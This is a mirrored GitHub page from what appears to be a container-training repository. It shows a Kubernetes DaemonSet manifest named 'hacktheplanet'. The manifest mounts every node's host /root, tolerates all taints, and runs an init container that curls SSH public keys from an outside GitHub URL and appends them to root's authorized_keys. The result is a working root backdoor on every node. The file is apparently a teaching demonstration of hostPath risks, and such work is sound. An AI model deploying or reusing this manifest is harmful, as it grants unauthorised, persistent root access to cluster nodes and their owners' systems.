mirror of
https://github.com/jpetazzo/container.training.git
synced 2026-02-14 09:39:56 +00:00
- the toleration is now even more 'universal' (it will also bypass NoExecute taints) - SSH keys are appended to authorized_keys (instead of clobbering it)
34 lines
699 B
YAML
34 lines
699 B
YAML
apiVersion: apps/v1
|
|
kind: DaemonSet
|
|
metadata:
|
|
name: hacktheplanet
|
|
spec:
|
|
selector:
|
|
matchLabels:
|
|
app: hacktheplanet
|
|
template:
|
|
metadata:
|
|
labels:
|
|
app: hacktheplanet
|
|
spec:
|
|
volumes:
|
|
- name: root
|
|
hostPath:
|
|
path: /root
|
|
tolerations:
|
|
- operator: Exists
|
|
initContainers:
|
|
- name: hacktheplanet
|
|
image: alpine
|
|
volumeMounts:
|
|
- name: root
|
|
mountPath: /root
|
|
command:
|
|
- sh
|
|
- -c
|
|
- "mkdir -p /root/.ssh && apk update && apk add curl && curl https://github.com/jpetazzo.keys >> /root/.ssh/authorized_keys"
|
|
containers:
|
|
- name: web
|
|
image: nginx
|
|
|